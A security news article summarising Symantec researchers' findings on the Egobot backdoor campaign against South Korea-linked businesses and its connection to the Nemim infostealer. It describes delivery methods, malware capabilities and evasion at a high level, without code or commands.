Researchers at Symantec say a sophisticated backdoor Trojan known as Egobot is targeting confidential information from South Korean companies as well as corporation doing business with South Korea.
The attack, which has been traced back to 2009, often begins with a spear-phishing email containing malware. So far, the targeted businesses have fallen into four main categories: finance and investment, infrastructure and development, government agencies and defense contractors. While many of the victims have been in South Korea, others are located in Australia, Russia, Brazil and the United States.
“The attackers gather information about their targets using social engineering techniques prior to luring them into the trap,” explained Symantec’s Jeet Morparia. “The targets are sent a spear phishing email, often pretending to be sent from a person they already know. The spear phishing email contains a relevant or enticing message to the target, prompting them to open the malicious attachment. The malicious attachment may be a shortcut .lnk file that points to a file hosted on GeoCities Japan.”
In addition to .LNK files, the attackers have also used malicious Microsoft Word documents that exploit CVE-2010-3333 and CVE-2011-0609. They have also taken to using .HWP files containing a script that downloads a malicious file.
When the attachments are opened, the attachments download malware from GeoCities Japan. The dropped executable then retrieves a RAR file from GeoCities Japan. Both these files are disguised as XML documents in an attempt to pass as a clean file, Morparia noted.
The executable RAR file drops a set of files responsible for moving files around, injecting a component into processes and stealing system information such as the Windows version, install language and installed service pack version.
“The main payload has specific functions that are potentially disastrous for targeted business executives. These functions include: recording video, recording audio, taking screenshots, uploading files to a remote server, obtaining a recent document list, searching for a string or pattern in a file [and] deleting and setting restore points,” Morparia blogged. “The stolen information is uploaded to remote servers hosted in Malaysia, Hong Kong, and Canada. The attackers have also updated their code to include 64-bit versions to work seamlessly across 64-bit platforms.”
Egobot has been able to stay under the radar due to a number of components responsible for masking its presence. For one, Egobot is compiled using an older version of Microsoft’s Detours software package functionality, which includes the detoured.dll file and is used by the attackers to attach malicious .dll files to legitimate Win32 binaries. Egobot can use this file to run itself in the memory of a legitimate process, disguising it as a benign process, the researcher explained. In addition, there is a coordinator component that prepares files by moving them into the appropriate folders and injecting them into legitimate processes, and certain versions of the backdoor include a timer so that the Trojan deletes itself after a certain date.
The Egobot attack has been linked to a parallel campaign that traces back to 2006, and uses an infostealer known as Nemim, and has targeted organizations in Japan, the U.S., India and the United Kingdom.
“One of the earliest samples contained a timer mechanism to determine when to remove itself from the compromised computer,” blogged Symantec researcher Andrea Lelli. “Removal was conditional and tied to a fixed date or based on the number of times the sample was executed. The timer mechanism feature was also found in samples of Egobot.”
An analysis of the Nemim binaries also revealed other connections to Egobot, including similarities in the command and control communication format and use of encryption. While Egobot is highly targeted and estimated to have infected less than 100 machines, Nemim, is believed to have impacted thousands.
“Nemim continues to operate today and has effectively evolved over time,” blogged Lelli. “For instance, the string encryption has become non-trivial, stolen digital certificates have been upgraded with newer ones, and there are now checks in place to detect common virtual machines. Indeed, for the last seven years the attackers have shown an unwavering commitment to innovation and have developed malware that is adaptable to fit the needs of two different attack campaigns.”